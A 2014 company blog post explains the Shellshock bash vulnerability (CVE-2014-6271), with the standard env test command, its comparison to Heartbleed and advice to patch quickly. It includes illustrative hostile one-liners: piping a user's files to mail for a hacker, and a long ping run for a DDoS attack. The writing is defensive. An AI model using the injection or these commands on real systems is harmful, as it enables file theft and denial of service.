Are You Vulnerable to the Shell Shock Bug?

September 26, 2014 | Heroix Staff

I’ve written a few posts where I’ve advocated moving from XP to Linux and stated that one of the benefits of Linux is that it is relatively malware and virus free. Not completely secure but relatively so. One avenue of attack for Linux and other Unix variants is that they have some basic core utilities that were written before internet security was a significant consideration and potential exploits are now being found in that comparatively ancient foundation.

Case in point: CVE-2014-6271, dubbed the Shell Shock bug. As per the explanation from the problem is that the bash shell in Unix/Linux allows you to define a variable as a function. However bash continues to process the code past the end of the function definition. The following command contains an example of the flaw that can be used to determine if you’re vulnerable:

env X='() { :;}; echo you are vulnerable' bash -c 'echo this was a test'

If you run this command and see “you are vulnerable” and “this was a test”, then the flaw can be exploited on your system. If all you see is “this was a test”, then you’re ok. The part of the command listed above that is a problem is the “echo you are vulnerable” section as it can be configured to run any command. In most cases the Shell Shock bug won’t run with root permissions so it won’t be able to delete system files. However even a minimally privileged user account can mail all a user’s files to a hacker (cd; cat * | mail –s “all my files” ), or set a computer up as a node in a DDOS attack (ping –c 9999999, or fill in your own computer security worst nightmare scenario.

Another factor is that Linux and Unix computers aren’t the only vulnerable systems. The bash shell is used on network devices, is embedded into the “internet of everything”, and is the base for Apple systems. The problem isn’t that it’s difficult to patch, the problem is that it is difficult to patch every bash shell with this vulnerability. Given the patch issues Apple has had recently they need to do their best to impress upon their users that the Shell Shock patch is a critical security update.

Is this as serious a threat as Heartbleed was? Yes. In fact it may be worse because it’s easier to exploit. Heartbleed exploited the possibility of finding confidential information in a random memory dump. Shell Shock can be exploited through CGI scripts in http headers and depends mostly on finding a vulnerable device. Hackers have already created worms to find devices and exploit Shell Shock less than a day after the vulnerability was announced.

In the last post I discussed how it’s a good idea to wait before you apply some patches. For OS patches like the quickly pulled iOS 8.0.1 you’re better off waiting. Security patches should be applied as soon as possible. With a vulnerability like Shell Shock you need to check all your systems, patch them as soon as patches are available and enact a mitigation plan until everything is patched.

Unfortunately final patches may take a while and bash updates issued as of 9/25 may not completely fix the problem. We will likely see multiple rounds of patches before this is fully addressed.



10/1/14 Update: See Shell Shock Patch Update for information on additional bash bugs and links to vendor patches.